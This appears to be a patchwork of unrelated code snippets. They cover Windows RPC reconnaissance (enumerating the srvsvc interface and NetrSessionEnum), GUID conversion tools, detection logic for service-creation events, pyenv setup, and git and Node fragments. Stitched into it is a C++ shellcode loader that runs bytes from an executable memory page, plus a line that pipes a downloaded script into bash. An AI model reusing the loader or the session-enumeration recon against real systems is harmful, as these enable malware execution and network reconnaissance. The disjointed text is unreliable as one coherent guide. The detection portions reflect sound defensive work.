Import-Module -Name NtObjectManager
# Parse every file under System32 for embedded RPC servers (non-PE files are skipped with errors)
$rpc = ls C:\Windows\System32\* | Get-RpcServer
# 4b324fc8-1670-01d3-1278-5a47bf6ee188 is the srvsvc (Server Service) interface
$rpc | Where-Object {$_.InterfaceId -eq '4b324fc8-1670-01d3-1278-5a47bf6ee188'} | Format-List
$server = $rpc | Where-Object {$_.InterfaceId -eq '4b324fc8-1670-01d3-1278-5a47bf6ee188'}
# Opnum 12 of srvsvc is NetrSessionEnum (MS-SRVS)
$Proc12 = $server.Procedures | Where-Object {$_.ProcNum -eq 12}
$Proc12
import struct
import uuid
import argparse

def hex_string_to_guid(hex_string):
    # Convert the hex string to bytes
    guid_bytes = bytes.fromhex(hex_string)
    if len(guid_bytes) != 16:
        print("Invalid GUID hex string length")
        return None
    # In memory Data1/Data2/Data3 are little-endian and Data4 is a byte array,
    # which is exactly the layout uuid's bytes_le expects
    return str(uuid.UUID(bytes_le=guid_bytes))
git rm --cached submodule_path   # delete reference to submodule HEAD (no trailing slash)
git rm .gitmodules               # if you have more than one submodule,
                                 # you need to edit this file instead of deleting!
rm -rf submodule_path/.git       # make sure you have backup!!
git add submodule_path           # will add files instead of commit reference
git commit -m "remove submodule"
# note: the submodule's section in .git/config and its clone under .git/modules/ are left behind
First function definition:
MS open docs here:
create the function signature:
NET_API_STATUS NetrSessionEnum(
    SRVSVC_HANDLE ServerName,
    WCHAR* ClientName,
    WCHAR* UserName,
    PSESSION_ENUM_STRUCT InfoStruct,
    DWORD PreferedMaximumLength,
    DWORD* TotalEntries,
    DWORD* ResumeHandle
);
For this cast to work you need to import two structs:
Service Creation Logs: Security 4697 and System 7045
Create Service
# Define service parameters
$serviceName = "MyTestService"
$serviceDisplayName = "MY Test Service"
$serviceDescription = "This is a test service created for demonstration purposes."
$serviceExecutablePath = "C:\Windows\System32\cmd.exe"
# Register the service (needs an elevated shell). Creation alone produces System 7045 and,
# when the "Audit Security System Extension" subcategory is enabled, Security 4697.
# cmd.exe is not a real service binary, so the service will fail to start, but the events are still logged.
New-Service -Name $serviceName -DisplayName $serviceDisplayName -Description $serviceDescription -BinaryPathName $serviceExecutablePath
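The two event IDs above are only useful if something reads them. Below is an added example (not from the original gist) of the triage logic a detection engineer would run over service-installation events: it takes already-parsed EventData fields of System 7045 and Security 4697 (the field names differ between the two, ImagePath vs ServiceFileName) and flags the patterns that the test service above exhibits, a command interpreter registered as a service binary, plus a few related ones: binaries in user-writable directories, the PsExec service, and unquoted paths with spaces. The sample events are constructed for this example; the service names other than MyTestService are made up.

```python
import ntpath
import re

# Constructed sample events (not real log exports): the keys mirror the EventData
# fields of System 7045 (Service Control Manager) and Security 4697.
SAMPLE_EVENTS = [
    {"Channel": "System", "EventID": 7045, "ServiceName": "MyTestService",
     "ImagePath": r"C:\Windows\System32\cmd.exe", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"Channel": "Security", "EventID": 4697, "SubjectUserName": "alice",
     "ServiceName": "UpdaterSvc",
     "ServiceFileName": r"C:\Users\alice\AppData\Local\Temp\upd.exe",
     "ServiceStartType": "2", "ServiceAccount": "LocalSystem"},
    {"Channel": "System", "EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    {"Channel": "System", "EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"Channel": "Security", "EventID": 4624, "SubjectUserName": "alice"},  # unrelated, must be ignored
    {"Channel": "System", "EventID": 7045, "ServiceName": "AcmeAgent",
     "ImagePath": r"C:\Program Files\Acme Agent\agent.exe -svc",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe"}
USER_WRITABLE = re.compile(r"\\(users|temp|programdata|appdata|public)\\", re.I)
SERVICE_EVENTS = {("System", 7045), ("Security", 4697)}


def image_path_of(event):
    """7045 carries the binary in ImagePath, 4697 in ServiceFileName."""
    return (event.get("ImagePath") or event.get("ServiceFileName") or "").strip()


def first_executable(image_path):
    """Return just the program from an ImagePath that may carry quotes and arguments."""
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return image_path[1:end] if end > 0 else image_path[1:]
    return image_path.split(" ", 1)[0]


def classify_service_event(event):
    """Return the list of reasons this service-installation event is suspicious (empty = benign)."""
    if (event.get("Channel"), event.get("EventID")) not in SERVICE_EVENTS:
        return []
    image_path = image_path_of(event)
    exe = first_executable(image_path)
    base = ntpath.basename(exe).lower()
    reasons = []
    if base in INTERPRETERS:
        reasons.append("service binary is a command interpreter or LOLBin: " + base)
    if USER_WRITABLE.search(exe):
        reasons.append("service binary lives in a user-writable directory")
    if base == "psexesvc.exe":
        reasons.append("PsExec service binary (remote execution)")
    # Unquoted path with spaces: the first token is not the executable, so the SCM
    # may run C:\Program.exe instead (classic privilege-escalation finding).
    if (not image_path.startswith('"') and " " in image_path
            and not exe.lower().endswith(".exe")):
        reasons.append("unquoted service path containing spaces")
    return reasons


def triage(events):
    """Keep only the suspicious events as [(EventID, ServiceName, reasons)]."""
    out = []
    for event in events:
        reasons = classify_service_event(event)
        if reasons:
            out.append((event["EventID"], event.get("ServiceName"), reasons))
    return out


if __name__ == "__main__":
    for event_id, name, reasons in triage(SAMPLE_EVENTS):
        print(event_id, name, "; ".join(reasons))
```

Feed it the EventData of real events (for example from `Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045}` converted to a dictionary) and the same function applies; the interpreter list and directory regex are the knobs to tune for your environment.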
import idaapi
import idautils
import idc
import struct
import uuid

CONTEXT_MENU_PATH = 'GUIDConvert/'
ITEM_NAME = 'Convert GUID Bytes'

class GuidConverterActionHandler(idaapi.action_handler_t):
    def activate(self, ctx):
        # Decode the 16 bytes under the cursor as an in-memory (little-endian) GUID and comment it
        ea = idc.get_screen_ea()
        raw = idc.get_bytes(ea, 16)
        if raw is None or len(raw) != 16:
            return 0
        idc.set_cmt(ea, str(uuid.UUID(bytes_le=raw)), 0)
        return 1

    def update(self, ctx):
        return idaapi.AST_ENABLE_ALWAYS
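Both the stand-alone converter script and the IDA plugin above hinge on one detail: an RPC interface ID is stored in memory with Data1, Data2 and Data3 little-endian and Data4 as a plain byte array, so reading the 16 bytes in string order gives the wrong GUID. The following is an added example, not part of either gist, that decodes the bytes both ways with the srvsvc interface ID from the NtObjectManager snippet at the top of the page, converts a known GUID back into its in-memory byte pattern, and uses that to locate interface IDs in a byte blob the way you would scan a DLL section. The blob and the "known interfaces" table are constructed for the example (the samr UUID is the real one); `guid_from_le_bytes` does the unpacking by hand and cross-checks itself against `uuid.UUID(bytes_le=...)`.

```python
import struct
import uuid

# Constructed sample: the srvsvc interface UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188
# as it is laid out in memory in an RPC_SERVER_INTERFACE / RPC_IF_ID structure:
# Data1 (DWORD), Data2 and Data3 (WORDs) little-endian, Data4 an 8-byte array.
SRVSVC_GUID = "4b324fc8-1670-01d3-1278-5a47bf6ee188"
SRVSVC_LE_HEX = "c84f324b7016d30112785a47bf6ee188"


def guid_from_le_bytes(raw):
    """Decode 16 in-memory bytes (mixed-endian GUID layout) to the canonical string."""
    if len(raw) != 16:
        raise ValueError("GUID must be 16 bytes, got %d" % len(raw))
    data1, data2, data3 = struct.unpack("<IHH", raw[:8])
    data4 = raw[8:]
    text = "%08x-%04x-%04x-%s-%s" % (data1, data2, data3, data4[:2].hex(), data4[2:].hex())
    # Cross-check the manual unpacking against the standard library's decoder.
    assert text == str(uuid.UUID(bytes_le=raw))
    return text


def guid_from_be_bytes(raw):
    """Decode the same bytes in string order (RFC 4122 network order). Doing this to
    in-memory bytes is the classic mistake: the first three groups come out byte-swapped."""
    return str(uuid.UUID(bytes=raw))


def guid_to_le_bytes(text):
    """Inverse: canonical string -> in-memory layout, i.e. the byte pattern to search for."""
    return uuid.UUID(text).bytes_le


def find_interface_guids(blob, known):
    """Scan a byte blob (e.g. a DLL's .rdata/.data section) for known interface IDs in
    in-memory layout. Returns [(offset, guid_string, name)] sorted by offset."""
    hits = []
    for name, text in known.items():
        needle = guid_to_le_bytes(text)
        start = 0
        while True:
            off = blob.find(needle, start)
            if off < 0:
                break
            hits.append((off, text, name))
            start = off + 1
    return sorted(hits)


# Constructed "section": padding, the srvsvc ID, filler, then the samr interface ID.
KNOWN_INTERFACES = {
    "srvsvc": SRVSVC_GUID,
    "samr": "12345778-1234-abcd-ef00-0123456789ac",
}
SAMPLE_BLOB = (b"\x00" * 32 + bytes.fromhex(SRVSVC_LE_HEX) + b"\xcc" * 8
               + guid_to_le_bytes(KNOWN_INTERFACES["samr"]))

if __name__ == "__main__":
    raw = bytes.fromhex(SRVSVC_LE_HEX)
    print("little-endian decode:", guid_from_le_bytes(raw))
    print("naive big-endian decode:", guid_from_be_bytes(raw))
    for off, text, name in find_interface_guids(SAMPLE_BLOB, KNOWN_INTERFACES):
        print("offset 0x%x: %s (%s)" % (off, text, name))
```

The naive decode of the srvsvc bytes yields c84f324b-7016-d301-1278-5a47bf6ee188, which matches nothing in any interface list; only the little-endian decode gives the ID that `Get-RpcServer` reports. The same `guid_to_le_bytes` pattern is what you would paste into a binary search in IDA to find where an interface is registered.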
it has come to my attention that people still have problems with their python environment.
- install pyenv with
curl https://pyenv.run | bash
pyenv install 3.11
now you have the latest python (it can also install pypy, anaconda and many others if you need)
pyenv global 3.11
now you have a global python
pyenv virtualenv 3.11 ape
now you have a virtualenv (this needs the pyenv-virtualenv plugin, which the installer above sets up)
pyenv local ape
now the project folder contains .python-version which automatically activates the environment when you enter the folder
read more about pyenv here https://github.com/pyenv/pyenv-installer
#include <iostream>
#include <Windows.h>

int main()
{
    // x64 shellcode; only the first rows survive in this preview, the remaining bytes are cut off
    char shellcode[] = "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
        "\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
        "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
        "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
        "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
        /* ... rest of the shellcode truncated in the preview ... */;

    // Classic loader: copy the bytes into an RWX page and call them as a function
    void* exec = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) return 1;
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}
var exec = require('child_process').execFile;
// execFile runs the binary directly (no cmd.exe in between), so arguments are not shell-parsed
var fun = function () {
    exec('<exe path>', {cwd: '<directory>'},
        function (err, data) {   // data is the process's stdout
            console.log(err);
            console.log(data.toString());
        });
};
fun();